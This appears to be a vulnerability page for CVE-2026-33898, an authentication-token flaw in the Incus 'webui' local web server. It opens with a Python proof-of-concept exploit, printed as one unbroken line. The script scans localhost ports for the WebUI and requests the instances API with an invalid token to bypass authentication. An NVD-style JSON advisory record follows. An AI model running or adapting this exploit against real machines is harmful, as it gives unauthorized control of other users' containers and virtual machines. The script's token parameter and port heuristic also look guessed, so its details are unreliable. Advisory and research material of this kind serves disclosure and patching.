CVE-2026-33898

import requests import socket # Proof of Concept for CVE-2026-33898 # This script scans localhost for the Incus WebUI and attempts to bypass authentication. def find_incus_port(start_port=30000, end_port=40000): """Scan localhost for the potential Incus WebUI port.""" open_ports = [] for port in range(start_port, end_port): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) socket.setdefaulttimeout(0.5) result = sock.connect_ex(('127.0.0.1', port)) if result == 0: # Check if it looks like Incus WebUI (heuristic) try: response = requests.get(f'http://127.0.0.1:{port}', timeout=1) if 'Incus' in response.text or 'token' in response.text: open_ports.append(port) except: pass sock.close() except: continue return open_ports def exploit_auth_bypass(port): """Attempts to access the API using a malformed/invalid token.""" # The vulnerability accepts invalid tokens in the URL target_url = f'http://127.0.0.1:{port}/1.0/instances?auth=invalid_token_bypass' try: response = requests.get(target_url) if response.status_code == 200: print(f"[+] Potential Bypass Successful on port {port}!") print(f"[+] Response: {response.text[:200]}") return True else: print(f"[-] Failed on port {port}. Status: {response.status_code}") except Exception as e: print(f"[-] Error connecting to port {port}: {e}") return False if __name__ == "__main__": print("[*] Scanning for Incus WebUI...") ports = find_incus_port() if not ports: print("[*] No potential Incus WebUI ports found.") else: print(f"[*] Found potential ports: {ports}") for p in ports: exploit_auth_bypass(p)

{"cve": {"id": "CVE-2026-33898", "sourceIdentifier": "[email protected]", "published": "2026-03-27T00:16:23.333", "lastModified": "2026-04-01T16:09:31.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incus is a system container and virtual machine manager. Prior to version 6.23.0, the web server spawned by `incus webui` incorrectly validates the authentication token such that an invalid value will be accepted. `incus webui` runs a local web server on a random localhost port. For authentication, it provides the user with a URL containing an authentication token. When accessed with that token, Incus creates a cookie persisting that token without needing to include it in subsequent HTTP requests. While the Incus client correctly validates the value of the cookie, it does not correctly validate the token when passed int the URL.\nThis allows for an attacker able to locate and talk to the temporary web server on localhost to have as much access to Incus as the user who ran `incus webui`. This can lead to privilege escalation by another local user or an access to the user's Incus instances and possibly system resources by a remote attack able to trick the local user into interacting with the Incus UI web server. Version 6.23.0 patches the issue."}, {"lang": "es", "value": "Incus es un gestor de contenedores de sistema y máquinas virtuales. Antes de la versión 6.23.0, el servidor web generado por `incus webui` valida incorrectamente el token de autenticación de tal manera que se acepta un valor no válido. `incus webui` ejecuta un servidor web local en un puerto localhost aleatorio. Para la autenticación, proporciona al usuario una URL que contiene un token de autenticación. Cuando se accede con ese token, Incus crea una cookie que persiste ese token sin necesidad de incluirlo en solicitudes HTTP posteriores. Si bien el cliente Incus valida correctamente el valor de la cookie, no valida correctamente el token cuando se pasa en la URL.\nEsto permite que un atacante capaz de localizar y comunicarse con el servidor web temporal en localhost tenga tanto acceso a Incus como el usuario que ejecutó `incus webui`. Esto puede conducir a una escalada de privilegios por parte de otro usuario local o a un acceso a las instancias de Incus del usuario y posiblemente a los recursos del sistema por parte de un ataque remoto capaz de engañar al usuario local para que interactúe con el servidor web de la interfaz de usuario de Incus. La versión 6.23.0 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.23.0", "matchCriteriaId": "CBE3ABCB-1D47-4A45-A09A-C9F609C53131"}]}]}], "references": [{"url": "https://github.com/lxc/incus/security/advisories/GHSA-453r-g2pg-cxxq", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}